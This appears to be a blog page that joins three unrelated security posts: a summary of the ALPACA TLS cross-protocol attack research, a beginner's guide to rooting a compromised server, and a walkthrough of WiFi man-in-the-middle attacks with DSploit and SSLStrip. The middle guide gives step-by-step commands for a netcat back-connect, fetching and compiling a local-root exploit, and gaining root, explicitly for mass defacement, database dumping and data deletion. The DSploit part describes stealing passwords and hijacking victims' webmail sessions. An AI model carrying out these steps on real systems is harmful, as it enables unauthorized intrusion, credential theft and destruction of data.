domingo, 28 de enero de 2024

ALPACA: Application Layer Protocol Confusion-Analyzing And Mitigating Cracks In TLS Authentication

In cooperation with the university Paderborn and Münster University of Applied Sciences, we discovered a new flaw in the specification of TLS. The vulnerability is called ALPACA and exploits a weakness in the authentication of TLS for cross-protocol attacks. The attack allows an attacker to steal cookies or perform cross-site-scripting (XSS) if the specific conditions for the attack are met.

TLS is an internet standard to secure the communication between servers and clients on the internet, for example that of web servers, FTP servers, and Email servers. This is possible because TLS was designed to be application layer independent, which allows its use in many diverse communication protocols.

ALPACA is an application layer protocol content confusion attack, exploiting TLS servers implementing different protocols but using compatible certificates, such as multi-domain or wildcard certificates. Attackers can redirect traffic from one subdomain to another, resulting in a valid TLS session. This breaks the authentication of TLS and cross-protocol attacks may be possible where the behavior of one protocol service may compromise the other at the application layer.

We investigate cross-protocol attacks on TLS in general and conducted a systematic case study on web servers, redirecting HTTPS requests from a victim's web browser to SMTP, IMAP, POP3, and FTP servers. We show that in realistic scenarios, the attacker can extract session cookies and other private user data or execute arbitrary JavaScript in the context of the vulnerable web server, therefore bypassing TLS and web application security.

We evaluated the real-world attack surface of web browsers and widely-deployed Email and FTP servers in lab experiments and with internet-wide scans. We find that 1.​4M web servers are generally vulnerable to cross-protocol attacks, i.e., TLS application data confusion is possible. Of these, 114k web servers can be attacked using an exploitable application server. As a countermeasure, we propose the use of the Application Layer Protocol Negotiation (ALPN) and Server Name Indication (SNI) extensions in TLS to prevent these and other cross-protocol attacks.

Although this vulnerability is very situational and can be challenging to exploit, there are some configurations that are exploitable even by a pure web attacker. Furthermore, we could only analyze a limited number of protocols, and other attack scenarios may exist. Thus, we advise that administrators review their deployments and that application developers (client and server) implement countermeasures proactively for all protocols.

More information on ALPACA can be found on the website

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Servers serve the requests made by the users to the web pages, it acts as a helping hand who serves the requested meal for you. Here I am sharing how to root a server. Root is the Administrator of all server. If someone got root access to it, he can do anything with a server like delete and copy anything on the server, can deface all the websites (massive deface ).
We can't talk about root on windows. That enough for a beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to get root.


There are 3 ways to get ROOT on the server :
1 – With local Root.
2 – With SQL by reading the same important files on it root password.
3 – With exploit on software (Buffer Overflow).
In this post, we will explain local Root. I will explain the other ways soon in some other post.
OK, let's back to work.
After Uploading your shell on the server and getting the local root you will do a back connect and run the local root to Get root. This is a small idea of how it works in the next step you will see how to
find local root and run it to get root access.


First of all we you need to know what version of Kernel.
You can know that from your shell, for example, this version is 2.6.18 – 2012
Go to EXECUTE on your shell and write  "uname -a". You will get the same result, by the way.
Now how to find the local root.
You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exist two types of local roots :
1. Local.C: which are not ready.
2. Local: ready to use.


First, you need a shell with a Back Connect option like this :
Enter your "Public IP Address" in SERVER, the port you want to connect on and leave it, Perl, this time, and Finally connect.
So now you must receive the back connect with a Tool named netcat u can download it from the
net. After that open your terminal if you are under Linux or CMD  if you are under Windows. I will explain only Linux, and for Windows, its all the same.
After that Follow the steps :
1- Press nc -vlp 433
2- Wget [the link of the]
3 – unzip

4 – chmod 777 local.c

5 – now to change the local-root from local.c > local
gcc local.c -o local Then you will find local.c transformed to local

6 – chmod 777 local

7 – ./local to local rootwork

8 – su
then see your id uid=0(root) gid=0(root) groups=0(root)

Getting UID=0 means, u had got root privileges and hence can do a variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.
As server gets rooted, you're able to do the many things with it like I mentioned above. Such as, withdrawal of domains, massive deface and also deletion of the data completely.
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After playing with the applications installed on the Pwn Pad, I found that the most important application (at least for me) was missing from the pre-installed apps. Namely, DSploit. Although DSploit has tons of features, I really liked the multiprotocol password sniffing (same as dsniff) and the session hijacking functionality.

The DSploit APK in the Play Store was not working for me, but the latest nightly on worked like a charm.

Most features require that you and your target uses the same WiFi network, and that's it. It can be Open, WEP, WPA/WPA2 Personal. On all of these networks, DSploit will sniff the passwords - because of the active attacks. E.g. a lot of email clients still use IMAP with clear text passwords, or some webmails, etc. 

First, DSploit lists the AP and the known devices on the network. In this case, I chose one victim client.

In the following submenu, there are tons of options, but the best features are in the MITM section. 

Stealthiness warning: in some cases, I received the following popup on the victim Windows:

This is what we have under the MITM submenu:

Password sniffing

For example, let's start with the Password Sniffer. It is the same as EvilAP and DSniff in my previous post. With the same results for the popular Hungarian webmail with the default secure login checkbox turned off. Don't forget, this is not an Open WiFi network, but one with WPA2 protection!

Session hijack

Now let's assume that the victim is very security-aware and he checks the secure login checkbox. Another cause can be that the victim already logged in, long before we started to attack. The session hijacking function is similar to the Firesheep tool, but it works with every website where the session cookies are sent in clear text, and there is no need for any additional support.

In a session hijacking attack (also called "sidejacking"), after the victim browser sends the authentication cookies in clear text, DSploit copies these cookies into its own browser, and opens the website with the same cookies, which results in successful login most of the time. Let's see session hijacking in action!

Here, we can see that the session cookies have been sniffed from the air:

Let's select that session, and be amazed that we logged into the user's webmail session.

Redirect traffic

This feature can be used both for fun or profit. For fun, you can redirect all the victim traffic to For-profit, you can redirect your victim to phishing pages.

Replace images, videos

I think this is just for fun here. Endless Rick Rolling possibilities.

Script injection

This is mostly for profit. client-side injection, drive-by-exploits, endless possibilities.

Custom filter

If you are familiar with ettercap, this has similar functionalities (but dumber), with string or regex replacements. E.g. you can replace the news, stock prices, which pizza the victim ordered, etc. If you know more fun stuff here, please leave a comment (only HTTP scenario - e.g. attacking Facebook won't work).

Additional fun (not in DSploit) - SSLStrip 

From the MITM section of DSploit, I really miss the SSLStrip functionality. Luckily, it is built into the Pwn Pad. With the help of SSLStrip, we can remove the references to HTTPS links in the clear text HTTP traffic, and replace those with HTTP. So even if the user checks the secure login checkbox at, the password will be sent in clear text - thus it can be sniffed with DSniff.

HTML source on the client-side without SSLstrip:

HTML source on the client-side with SSL strip:

With EvilAP, SSLStrip, and DSniff, the password can be stolen. No hacking skillz needed.

Lessons learned here

If you are a website operator where you allow your users to login, always:
  1. Use HTTPS with a trusted certificate, and redirect all unencrypted traffic to HTTPS ASAP
  2. Mark the session cookies with the secure flag
  3. Use HSTS to prevent SSLStrip attacks
If you are a user:
  1. Don't trust sites with your confidential data if the above points are not fixed. Choose a more secure alternative
  2. Use HTTPS everywhere plugin
  3. For improved security, use VPN
Because hacking has never been so easy before.
And last but not least, if you like the DSploit project, don't forget to donate them!
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